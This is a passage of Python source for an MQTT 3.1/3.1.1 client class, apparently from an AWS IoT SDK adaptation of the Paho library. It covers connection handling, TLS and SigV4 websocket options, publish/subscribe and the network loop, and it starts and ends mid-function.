"""TCP/IP socketpair including Windows support"""
listensock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
listensock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listensock.bind(("127.0.0.1", 0))
listensock.listen(1)
iface, port = listensock.getsockname()
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
sock1.setblocking(0)
try:
sock1.connect(("127.0.0.1", port))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
sock2, address = listensock.accept()
sock2.setblocking(0)
listensock.close()
return (sock1, sock2)
class MQTTMessage:
""" This is a class that describes an incoming message. It is passed to the
on_message callback as the message parameter.
Members:
topic : String. topic that the message was published on.
payload : String/bytes the message payload.
qos : Integer. The message Quality of Service 0, 1 or 2.
retain : Boolean. If true, the message is a retained message and not fresh.
mid : Integer. The message id.
"""
def __init__(self):
self.timestamp = 0
self.state = mqtt_ms_invalid
self.dup = False
self.mid = 0
self.topic = ""
self.payload = None
self.qos = 0
self.retain = False
class Client(object):
"""MQTT version 3.1/3.1.1 client class.
This is the main class for use communicating with an MQTT broker.
General usage flow:
* Use connect()/connect_async() to connect to a broker
* Call loop() frequently to maintain network traffic flow with the broker
* Or use loop_start() to set a thread running to call loop() for you.
* Or use loop_forever() to handle calling loop() for you in a blocking
* function.
* Use subscribe() to subscribe to a topic and receive messages
* Use publish() to send messages
* Use disconnect() to disconnect from the broker
Data returned from the broker is made available with the use of callback
functions as described below.
Callbacks
=========
A number of callback functions are available to receive data back from the
broker. To use a callback, define a function and then assign it to the
client:
def on_connect(client, userdata, flags, rc):
print("Connection returned " + str(rc))
client.on_connect = on_connect
All of the callbacks as described below have a "client" and an "userdata"
argument. "client" is the Client instance that is calling the callback.
"userdata" is user data of any type and can be set when creating a new client
instance or with user_data_set(userdata).
The callbacks:
on_connect(client, userdata, flags, rc): called when the broker responds to our connection
request.
flags is a dict that contains response flags from the broker:
flags['session present'] - this flag is useful for clients that are
using clean session set to 0 only. If a client with clean
session=0, that reconnects to a broker that it has previously
connected to, this flag indicates whether the broker still has the
session information for the client. If 1, the session still exists.
The value of rc determines success or not:
0: Connection successful
1: Connection refused - incorrect protocol version
2: Connection refused - invalid client identifier
3: Connection refused - server unavailable
4: Connection refused - bad username or password
5: Connection refused - not authorised
6-255: Currently unused.
on_disconnect(client, userdata, rc): called when the client disconnects from the broker.
The rc parameter indicates the disconnection state. If MQTT_ERR_SUCCESS
(0), the callback was called in response to a disconnect() call. If any
other value the disconnection was unexpected, such as might be caused by
a network error.
on_message(client, userdata, message): called when a message has been received on a
topic that the client subscribes to. The message variable is a
MQTTMessage that describes all of the message parameters.
on_publish(client, userdata, mid): called when a message that was to be sent using the
publish() call has completed transmission to the broker. For messages
with QoS levels 1 and 2, this means that the appropriate handshakes have
completed. For QoS 0, this simply means that the message has left the
client. The mid variable matches the mid variable returned from the
corresponding publish() call, to allow outgoing messages to be tracked.
This callback is important because even if the publish() call returns
success, it does not always mean that the message has been sent.
on_subscribe(client, userdata, mid, granted_qos): called when the broker responds to a
subscribe request. The mid variable matches the mid variable returned
from the corresponding subscribe() call. The granted_qos variable is a
list of integers that give the QoS level the broker has granted for each
of the different subscription requests.
on_unsubscribe(client, userdata, mid): called when the broker responds to an unsubscribe
request. The mid variable matches the mid variable returned from the
corresponding unsubscribe() call.
on_log(client, userdata, level, buf): called when the client has log information. Define
to allow debugging. The level variable gives the severity of the message
and will be one of MQTT_LOG_INFO, MQTT_LOG_NOTICE, MQTT_LOG_WARNING,
MQTT_LOG_ERR, and MQTT_LOG_DEBUG. The message itself is in buf.
"""
def __init__(self, client_id="", clean_session=True, userdata=None, protocol=MQTTv31, useSecuredWebsocket=False):
"""client_id is the unique client id string used when connecting to the
broker. If client_id is zero length or None, then one will be randomly
generated. In this case, clean_session must be True. If this is not the
case a ValueError will be raised.
clean_session is a boolean that determines the client type. If True,
the broker will remove all information about this client when it
disconnects. If False, the client is a persistent client and
subscription information and queued messages will be retained when the
client disconnects.
Note that a client will never discard its own outgoing messages on
disconnect. Calling connect() or reconnect() will cause the messages to
be resent. Use reinitialise() to reset a client to its original state.
userdata is user defined data of any type that is passed as the "userdata"
parameter to callbacks. It may be updated at a later point with the
user_data_set() function.
The protocol argument allows explicit setting of the MQTT version to
use for this client. Can be paho.mqtt.client.MQTTv311 (v3.1.1) or
paho.mqtt.client.MQTTv31 (v3.1), with the default being v3.1. If the
broker reports that the client connected with an invalid protocol
version, the client will automatically attempt to reconnect using v3.1
instead.
useSecuredWebsocket is a boolean that determines whether the client uses
MQTT over Websocket with sigV4 signing (True) or MQTT with plain TCP
socket. If True, the client will try to find AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY in the system environment variables and start the
sigV4 signing and Websocket handshake. Under this configuration, all
outbound MQTT packets will be wrapped around with Websocket framework. All
inbound MQTT packets will be automatically wss-decoded.
"""
if not clean_session and (client_id == "" or client_id is None):
raise ValueError('A client id must be provided if clean session is False.')
self._protocol = protocol
self._userdata = userdata
self._sock = None
self._sockpairR, self._sockpairW = _socketpair_compat()
self._keepalive = 60
self._message_retry = 20
self._last_retry_check = 0
self._clean_session = clean_session
if client_id == "" or client_id is None:
self._client_id = "paho/" + "".join(random.choice("0123456789ADCDEF") for x in range(23-5))
else:
self._client_id = client_id
self._username = ""
self._password = ""
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet = []
self._current_out_packet = None
self._last_msg_in = time.time()
self._last_msg_out = time.time()
self._ping_t = 0
self._last_mid = 0
self._state = mqtt_cs_new
self._max_inflight_messages = 20
self._out_messages = []
self._in_messages = []
self._inflight_messages = 0
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
self.on_disconnect = None
self.on_connect = None
self.on_publish = None
self.on_message = None
self.on_message_filtered = []
self.on_subscribe = None
self.on_unsubscribe = None
self.on_log = None
self._host = ""
self._port = 1883
self._bind_address = ""
self._in_callback = False
self._strict_protocol = False
self._callback_mutex = threading.Lock()
self._state_mutex = threading.Lock()
self._out_packet_mutex = threading.Lock()
self._current_out_packet_mutex = threading.Lock()
self._msgtime_mutex = threading.Lock()
self._out_message_mutex = threading.Lock()
self._in_message_mutex = threading.Lock()
self._thread = None
self._thread_terminate = False
self._ssl = None
self._tls_certfile = None
self._tls_keyfile = None
self._tls_ca_certs = None
self._tls_cert_reqs = None
self._tls_ciphers = None
self._tls_version = tls_version
self._tls_insecure = False
self._useSecuredWebsocket = useSecuredWebsocket # Do we enable secured websocket
self._backoffCore = backoffCore.progressiveBackoffCore() # Init the backoffCore using default configuration
self._AWSAccessKeyIDCustomConfig = ""
self._AWSSecretAccessKeyCustomConfig = ""
self._AWSSessionTokenCustomConfig = ""
def __del__(self):
pass
def setBackoffTiming(self, srcBaseReconnectTimeSecond, srcMaximumReconnectTimeSecond, srcMinimumConnectTimeSecond):
"""
Make custom settings for backoff timing for reconnect logic
srcBaseReconnectTimeSecond - The base reconnection time in seconds
srcMaximumReconnectTimeSecond - The maximum reconnection time in seconds
srcMinimumConnectTimeSecond - The minimum time in milliseconds that a connection must be maintained in order to be considered stable
* Raise ValueError if input params are malformed
"""
self._backoffCore.configTime(srcBaseReconnectTimeSecond, srcMaximumReconnectTimeSecond, srcMinimumConnectTimeSecond)
def configIAMCredentials(self, srcAWSAccessKeyID, srcAWSSecretAccessKey, srcAWSSessionToken):
"""
Make custom settings for IAM credentials for websocket connection
srcAWSAccessKeyID - AWS IAM access key
srcAWSSecretAccessKey - AWS IAM secret key
srcAWSSessionToken - AWS Session Token
"""
self._AWSAccessKeyIDCustomConfig = srcAWSAccessKeyID
self._AWSSecretAccessKeyCustomConfig = srcAWSSecretAccessKey
self._AWSSessionTokenCustomConfig = srcAWSSessionToken
def reinitialise(self, client_id="", clean_session=True, userdata=None):
if self._ssl:
self._ssl.close()
self._ssl = None
self._sock = None
elif self._sock:
self._sock.close()
self._sock = None
if self._sockpairR:
self._sockpairR.close()
self._sockpairR = None
if self._sockpairW:
self._sockpairW.close()
self._sockpairW = None
self.__init__(client_id, clean_session, userdata)
def tls_set(self, ca_certs, certfile=None, keyfile=None, cert_reqs=cert_reqs, tls_version=tls_version, ciphers=None):
"""Configure network encryption and authentication options. Enables SSL/TLS support.
ca_certs : a string path to the Certificate Authority certificate files
that are to be treated as trusted by this client. If this is the only
option given then the client will operate in a similar manner to a web
browser. That is to say it will require the broker to have a
certificate signed by the Certificate Authorities in ca_certs and will
communicate using TLS v1, but will not attempt any form of
authentication. This provides basic network encryption but may not be
sufficient depending on how the broker is configured.
certfile and keyfile are strings pointing to the PEM encoded client
certificate and private keys respectively. If these arguments are not
None then they will be used as client information for TLS based
authentication. Support for this feature is broker dependent. Note
that if either of these files in encrypted and needs a password to
decrypt it, Python will ask for the password at the command line. It is
not currently possible to define a callback to provide the password.
cert_reqs allows the certificate requirements that the client imposes
on the broker to be changed. By default this is ssl.CERT_REQUIRED,
which means that the broker must provide a certificate. See the ssl
pydoc for more information on this parameter.
tls_version allows the version of the SSL/TLS protocol used to be
specified. By default TLS v1 is used. Previous versions (all versions
beginning with SSL) are possible but not recommended due to possible
security problems.
ciphers is a string specifying which encryption ciphers are allowable
for this connection, or None to use the defaults. See the ssl pydoc for
more information.
Must be called before connect() or connect_async()."""
if HAVE_SSL is False:
raise ValueError('This platform has no SSL/TLS.')
if sys.version < '2.7':
raise ValueError('Python 2.7 is the minimum supported version for TLS.')
if ca_certs is None:
raise ValueError('ca_certs must not be None.')
try:
f = open(ca_certs, "r")
except IOError as err:
raise IOError(ca_certs+": "+err.strerror)
else:
f.close()
if certfile is not None:
try:
f = open(certfile, "r")
except IOError as err:
raise IOError(certfile+": "+err.strerror)
else:
f.close()
if keyfile is not None:
try:
f = open(keyfile, "r")
except IOError as err:
raise IOError(keyfile+": "+err.strerror)
else:
f.close()
self._tls_ca_certs = ca_certs
self._tls_certfile = certfile
self._tls_keyfile = keyfile
self._tls_cert_reqs = cert_reqs
self._tls_version = tls_version
self._tls_ciphers = ciphers
def tls_insecure_set(self, value):
"""Configure verification of the server hostname in the server certificate.
If value is set to true, it is impossible to guarantee that the host
you are connecting to is not impersonating your server. This can be
useful in initial server testing, but makes it possible for a malicious
third party to impersonate your server through DNS spoofing, for
example.
Do not use this function in a real system. Setting value to true means
there is no point using encryption.
Must be called before connect()."""
if HAVE_SSL is False:
raise ValueError('This platform has no SSL/TLS.')
self._tls_insecure = value
def connect(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
"""
self.connect_async(host, port, keepalive, bind_address)
return self.reconnect()
def connect_srv(self, domain=None, keepalive=60, bind_address=""):
"""Connect to a remote broker.
domain is the DNS domain to search for SRV records; if None,
try to determine local domain name.
keepalive and bind_address are as for connect()
"""
if HAVE_DNS is False:
raise ValueError('No DNS resolver library found.')
if domain is None:
domain = socket.getfqdn()
domain = domain[domain.find('.') + 1:]
try:
rr = '_mqtt._tcp.%s' % domain
if self._ssl is not None:
# IANA specifies secure-mqtt (not mqtts) for port 8883
rr = '_secure-mqtt._tcp.%s' % domain
answers = []
for answer in dns.resolver.query(rr, dns.rdatatype.SRV):
addr = answer.target.to_text()[:-1]
answers.append((addr, answer.port, answer.priority, answer.weight))
except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.NoNameservers):
raise ValueError("No answer/NXDOMAIN for SRV in %s" % (domain))
# FIXME: doesn't account for weight
for answer in answers:
host, port, prio, weight = answer
try:
return self.connect(host, port, keepalive, bind_address)
except:
pass
raise ValueError("No SRV hosts responded")
def connect_async(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker asynchronously. This is a non-blocking
connect call that can be used with loop_start() to provide very quick
start.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
"""
if host is None or len(host) == 0:
raise ValueError('Invalid host.')
if port <= 0:
raise ValueError('Invalid port number.')
if keepalive < 0:
raise ValueError('Keepalive must be >=0.')
if bind_address != "" and bind_address is not None:
if (sys.version_info[0] == 2 and sys.version_info[1] < 7) or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
raise ValueError('bind_address requires Python 2.7 or 3.2.')
self._host = host
self._port = port
self._keepalive = keepalive
self._bind_address = bind_address
self._state_mutex.acquire()
self._state = mqtt_cs_connect_async
self._state_mutex.release()
def reconnect(self):
"""Reconnect the client after a disconnect. Can only be called after
connect()/connect_async()."""
if len(self._host) == 0:
raise ValueError('Invalid host.')
if self._port <= 0:
raise ValueError('Invalid port number.')
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet_mutex.acquire()
self._out_packet = []
self._out_packet_mutex.release()
self._current_out_packet_mutex.acquire()
self._current_out_packet = None
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_in = time.time()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
self._ping_t = 0
self._state_mutex.acquire()
self._state = mqtt_cs_new
self._state_mutex.release()
if self._ssl:
self._ssl.close()
self._ssl = None
self._sock = None
elif self._sock:
self._sock.close()
self._sock = None
# Put messages in progress in a valid state.
self._messages_reconnect_reset()
try:
if (sys.version_info[0] == 2 and sys.version_info[1] < 7) or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
sock = socket.create_connection((self._host, self._port))
else:
sock = socket.create_connection((self._host, self._port), source_address=(self._bind_address, 0))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
if self._tls_ca_certs is not None:
if self._useSecuredWebsocket:
# Never assign to ._ssl before wss handshake is finished
# Non-None value for ._ssl will allow ops before wss-MQTT connection is established
rawSSL = ssl.wrap_socket(sock, ca_certs=self._tls_ca_certs, cert_reqs=ssl.CERT_REQUIRED) # Add server certificate verification
rawSSL.setblocking(0) # Non-blocking socket
self._ssl = wssCore.securedWebsocketCore(rawSSL, self._host, self._port, self._AWSAccessKeyIDCustomConfig, self._AWSSecretAccessKeyCustomConfig, self._AWSSessionTokenCustomConfig) # Overeride the _ssl socket
# self._ssl.enableDebug()
else:
self._ssl = ssl.wrap_socket(
sock,
certfile=self._tls_certfile,
keyfile=self._tls_keyfile,
ca_certs=self._tls_ca_certs,
cert_reqs=self._tls_cert_reqs,
ssl_version=self._tls_version,
ciphers=self._tls_ciphers)
if self._tls_insecure is False:
if sys.version_info[0] < 3 or (sys.version_info[0] == 3 and sys.version_info[1] < 2):
self._tls_match_hostname()
else:
ssl.match_hostname(self._ssl.getpeercert(), self._host)
self._sock = sock
self._sock.setblocking(0)
return self._send_connect(self._keepalive, self._clean_session)
def loop(self, timeout=1.0, max_packets=1):
"""Process network events.
This function must be called regularly to ensure communication with the
broker is carried out. It calls select() on the network socket to wait
for network events. If incoming data is present it will then be
processed. Outgoing commands, from e.g. publish(), are normally sent
immediately that their function is called, but this is not always
possible. loop() will also attempt to send any remaining outgoing
messages, which also includes commands that are part of the flow for
messages with QoS>0.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
Returns MQTT_ERR_SUCCESS on success.
Returns >0 on error.
A ValueError will be raised if timeout < 0"""
if timeout < 0.0:
raise ValueError('Invalid timeout.')
self._current_out_packet_mutex.acquire()
self._out_packet_mutex.acquire()
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
if self._current_out_packet:
wlist = [self.socket()]
else:
wlist = []
self._out_packet_mutex.release()
self._current_out_packet_mutex.release()
# sockpairR is used to break out of select() before the timeout, on a
# call to publish() etc.
rlist = [self.socket(), self._sockpairR]
try:
socklist = select.select(rlist, wlist, [], timeout)
except TypeError as e:
# Socket isn't correct type, in likelihood connection is lost
return MQTT_ERR_CONN_LOST
except ValueError:
# Can occur if we just reconnected but rlist/wlist contain a -1 for
# some reason.
return MQTT_ERR_CONN_LOST
except:
return MQTT_ERR_UNKNOWN
if self.socket() in socklist[0]:
rc = self.loop_read(max_packets)
if rc or (self._ssl is None and self._sock is None):
return rc
if self._sockpairR in socklist[0]:
# Stimulate output write even though we didn't ask for it, because
# at that point the publish or other command wasn't present.
socklist[1].insert(0, self.socket())
# Clear sockpairR - only ever a single byte written.
try:
self._sockpairR.recv(1)
except socket.error as err:
if err.errno != EAGAIN:
raise
if self.socket() in socklist[1]:
rc = self.loop_write(max_packets)
if rc or (self._ssl is None and self._sock is None):
return rc
return self.loop_misc()
def publish(self, topic, payload=None, qos=0, retain=False):
"""Publish a message on a topic.
This causes a message to be sent to the broker and subsequently from
the broker to any clients subscribing to matching topics.
topic: The topic that the message should be published on.
payload: The actual message to send. If not given, or set to None a
zero length message will be used. Passing an int or float will result
in the payload being converted to a string representing that number. If
you wish to send a true int/float, use struct.pack() to create the
payload you require.
qos: The quality of service level to use.
retain: If set to true, the message will be set as the "last known
good"/retained message for the topic.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS to
indicate success or MQTT_ERR_NO_CONN if the client is not currently
connected. mid is the message ID for the publish request. The mid
value can be used to track the publish request by checking against the
mid argument in the on_publish() callback if it is defined.
A ValueError will be raised if topic is None, has zero length or is
invalid (contains a wildcard), if qos is not one of 0, 1 or 2, or if
the length of the payload is greater than 268435455 bytes."""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, str) or isinstance(payload, bytearray):
local_payload = payload
elif sys.version_info[0] < 3 and isinstance(payload, unicode):
local_payload = payload
elif isinstance(payload, int) or isinstance(payload, float):
local_payload = str(payload)
elif payload is None:
local_payload = None
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
if local_payload is not None and len(local_payload) > 268435455:
raise ValueError('Payload too large.')
if self._topic_wildcard_len_check(topic) != MQTT_ERR_SUCCESS:
raise ValueError('Publish topic cannot contain wildcards.')
local_mid = self._mid_generate()
if qos == 0:
rc = self._send_publish(local_mid, topic, local_payload, qos, retain, False)
return (rc, local_mid)
else:
message = MQTTMessage()
message.timestamp = time.time()
message.mid = local_mid
message.topic = topic
if local_payload is None or len(local_payload) == 0:
message.payload = None
else:
message.payload = local_payload
message.qos = qos
message.retain = retain
message.dup = False
self._out_message_mutex.acquire()
self._out_messages.append(message)
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
self._inflight_messages = self._inflight_messages+1
if qos == 1:
message.state = mqtt_ms_wait_for_puback
elif qos == 2:
message.state = mqtt_ms_wait_for_pubrec
self._out_message_mutex.release()
rc = self._send_publish(message.mid, message.topic, message.payload, message.qos, message.retain, message.dup)
# remove from inflight messages so it will be send after a connection is made
if rc is MQTT_ERR_NO_CONN:
with self._out_message_mutex:
self._inflight_messages -= 1
message.state = mqtt_ms_publish
return (rc, local_mid)
else:
message.state = mqtt_ms_queued;
self._out_message_mutex.release()
return (MQTT_ERR_SUCCESS, local_mid)
def username_pw_set(self, username, password=None):
"""Set a username and optionally a password for broker authentication.
Must be called before connect() to have any effect.
Requires a broker that supports MQTT v3.1.
username: The username to authenticate with. Need have no relationship to the client id.
password: The password to authenticate with. Optional, set to None if not required.
"""
self._username = username.encode('utf-8')
self._password = password
def disconnect(self):
"""Disconnect a connected client from the broker."""
self._state_mutex.acquire()
self._state = mqtt_cs_disconnecting
self._state_mutex.release()
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
return self._send_disconnect()
def subscribe(self, topic, qos=0):
"""Subscribe the client to one or more topics.
This function may be called in three different ways:
Simple string and integer
-------------------------
e.g. subscribe("my/topic", 2)
topic: A string specifying the subscription topic to subscribe to.
qos: The desired quality of service level for the subscription.
Defaults to 0.
String and integer tuple
------------------------
e.g. subscribe(("my/topic", 1))
topic: A tuple of (topic, qos). Both topic and qos must be present in
the tuple.
qos: Not used.
List of string and integer tuples
------------------------
e.g. subscribe([("my/topic", 0), ("another/topic", 2)])
This allows multiple topic subscriptions in a single SUBSCRIPTION
command, which is more efficient than using multiple calls to
subscribe().
topic: A list of tuple of format (topic, qos). Both topic and qos must
be present in all of the tuples.
qos: Not used.
The function returns a tuple (result, mid), where result is
MQTT_ERR_SUCCESS to indicate success or (MQTT_ERR_NO_CONN, None) if the
client is not currently connected. mid is the message ID for the
subscribe request. The mid value can be used to track the subscribe
request by checking against the mid argument in the on_subscribe()
callback if it is defined.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length, or if topic is not a string, tuple or list.
"""
topic_qos_list = None
if isinstance(topic, str):
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
topic_qos_list = [(topic.encode('utf-8'), qos)]
elif isinstance(topic, tuple):
if topic[1]<0 or topic[1]>2:
raise ValueError('Invalid QoS level.')
if topic[0] is None or len(topic[0]) == 0 or not isinstance(topic[0], str):
raise ValueError('Invalid topic.')
topic_qos_list = [(topic[0].encode('utf-8'), topic[1])]
elif isinstance(topic, list):
topic_qos_list = []
for t in topic:
if t[1]<0 or t[1]>2:
raise ValueError('Invalid QoS level.')
if t[0] is None or len(t[0]) == 0 or not isinstance(t[0], str):
raise ValueError('Invalid topic.')
topic_qos_list.append((t[0].encode('utf-8'), t[1]))
if topic_qos_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None and self._ssl is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_subscribe(False, topic_qos_list)
def unsubscribe(self, topic):
"""Unsubscribe the client from one or more topics.
topic: A single string, or list of strings that are the subscription
topics to unsubscribe from.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS
to indicate success or (MQTT_ERR_NO_CONN, None) if the client is not
currently connected.
mid is the message ID for the unsubscribe request. The mid value can be
used to track the unsubscribe request by checking against the mid
argument in the on_unsubscribe() callback if it is defined.
Raises a ValueError if topic is None or has zero string length, or is
not a string or list.
"""
topic_list = None
if topic is None:
raise ValueError('Invalid topic.')
if isinstance(topic, str):
if len(topic) == 0:
raise ValueError('Invalid topic.')
topic_list = [topic.encode('utf-8')]
elif isinstance(topic, list):
topic_list = []
for t in topic:
if len(t) == 0 or not isinstance(t, str):
raise ValueError('Invalid topic.')
topic_list.append(t.encode('utf-8'))
if topic_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None and self._ssl is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_unsubscribe(False, topic_list)
def loop_read(self, max_packets=1):
"""Process read network events. Use in place of calling loop() if you
wish to handle your client reads as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_messages) + len(self._in_messages)
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_read()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def loop_write(self, max_packets=1):
"""Process read network events. Use in place of calling loop() if you
wish to handle your client reads as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Use want_write() to determine if there is data waiting to be written.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_packet) + 1
if max_packets < 1:
max_packets = 1
for i in range(0, max_packets):
rc = self._packet_write()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def want_write(self):
"""Call to determine if there is network data waiting to be written.
Useful if you are calling select() yourself rather than using loop().
"""
if self._current_out_packet or len(self._out_packet) > 0:
return True
else:
return False
def loop_misc(self):
"""Process miscellaneous network events. Use in place of calling loop() if you
wish to call select() or equivalent on.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
now = time.time()
self._check_keepalive()
if self._last_retry_check+1 < now:
# Only check once a second at most
self._message_retry_check()
self._last_retry_check = now
if self._ping_t > 0 and now - self._ping_t >= self._keepalive:
# client->ping_t != 0 means we are waiting for a pingresp.
# This hasn't happened in the keepalive time so we should disconnect.
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
self._callback_mutex.acquire()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_CONN_LOST
return MQTT_ERR_SUCCESS
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way
through their network flow at once. Defaults to 20."""
if inflight < 0:
raise ValueError('Invalid inflight.')
self._max_inflight_messages = inflight
def message_retry_set(self, retry):
"""Set the timeout in seconds before a message with QoS>0 is retried.
20 seconds by default."""
if retry < 0:
raise ValueError('Invalid retry.')
self._message_retry = retry
def user_data_set(self, userdata):
"""Set the user data variable passed to callbacks. May be any data type."""
self._userdata = userdata
def will_set(self, topic, payload=None, qos=0, retain=False):
"""Set a Will to be sent by the broker in case the client disconnects unexpectedly.
This must be called before connect() to have any effect.
topic: The topic that the will message should be published on.
payload: The message to send as a will. If not given, or set to None a
zero length message will be used as the will. Passing an int or float
will result in the payload being converted to a string representing
that number. If you wish to send a true int/float, use struct.pack() to
create the payload you require.
qos: The quality of service level to use for the will.
retain: If set to true, the will message will be set as the "last known
good"/retained message for the topic.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length.
"""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, str):
self._will_payload = payload.encode('utf-8')
elif isinstance(payload, bytearray):
self._will_payload = payload
elif isinstance(payload, int) or isinstance(payload, float):
self._will_payload = str(payload)
elif payload is None:
self._will_payload = None
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
self._will = True
self._will_topic = topic.encode('utf-8')
self._will_qos = qos
self._will_retain = retain
def will_clear(self):
""" Removes a will that was previously configured with will_set().
Must be called before connect() to have any effect."""
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
def socket(self):
"""Return the socket or ssl object for this client."""
if self._ssl:
if self._useSecuredWebsocket:
return self._ssl.getSSLSocket()
else:
return self._ssl
else:
return self._sock
def loop_forever(self, timeout=1.0, max_packets=1, retry_first_connection=False):
"""This function call loop() for you in an infinite blocking loop. It
is useful for the case where you only want to run the MQTT client loop
in your program.
loop_forever() will handle reconnecting for you. If you call
disconnect() in a callback it will return.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
retry_first_connection: Should the first connection attempt be retried on failure.
Raises socket.error on first connection failures unless retry_first_connection=True
"""
run = True
while run:
if self._state == mqtt_cs_connect_async:
try:
self.reconnect()
except socket.error:
if not retry_first_connection:
raise
self._easy_log(MQTT_LOG_DEBUG, "Connection failed, retrying")
self._backoffCore.backOff()
# time.sleep(1)
else:
break
while run:
rc = MQTT_ERR_SUCCESS
while rc == MQTT_ERR_SUCCESS:
rc = self.loop(timeout, max_packets)
# We don't need to worry about locking here, because we've
# either called loop_forever() when in single threaded mode, or
# in multi threaded mode when loop_stop() has been called and
# so no other threads can access _current_out_packet,
# _out_packet or _messages.
if (self._thread_terminate is True
and self._current_out_packet is None
and len(self._out_packet) == 0
and len(self._out_messages) == 0):
rc = 1
run = False
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True:
run = False
self._state_mutex.release()
else:
self._state_mutex.release()
self._backoffCore.backOff()
# time.sleep(1)
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True:
run = False
self._state_mutex.release()
else:
self._state_mutex.release()
try:
self.reconnect()
except socket.error as err:
pass
return rc
def loop_start(self):
"""This is part of the threaded client interface. Call this once to
start a new thread to process network traffic. This provides an
alternative to repeatedly calling loop() yourself.
"""
if self._thread is not None:
return MQTT_ERR_INVAL
self._thread_terminate = False
self._thread = threading.Thread(target=self._thread_main)
self._thread.daemon = True
self._thread.start()
def loop_stop(self, force=False):
"""This is part of the threaded client interface. Call this once to
stop the network thread previously created with loop_start(). This call
will block until the network thread finishes.
The force parameter is currently ignored.
"""
if self._thread is None:
return MQTT_ERR_INVAL
self._thread_terminate = True
self._thread.join()
self._thread = None
def message_callback_add(self, sub, callback):
"""Register a message callback for a specific topic.
Messages that match 'sub' will be passed to 'callback'. Any
non-matching messages will be passed to the default on_message
callback.
Call multiple times with different 'sub' to define multiple topic
specific callbacks.
Topic specific callbacks may be removed with
message_callback_remove()."""
if callback is None or sub is None:
raise ValueError("sub and callback must both be defined.")
self._callback_mutex.acquire()
for i in range(0, len(self.on_message_filtered)):
if self.on_message_filtered[i][0] == sub:
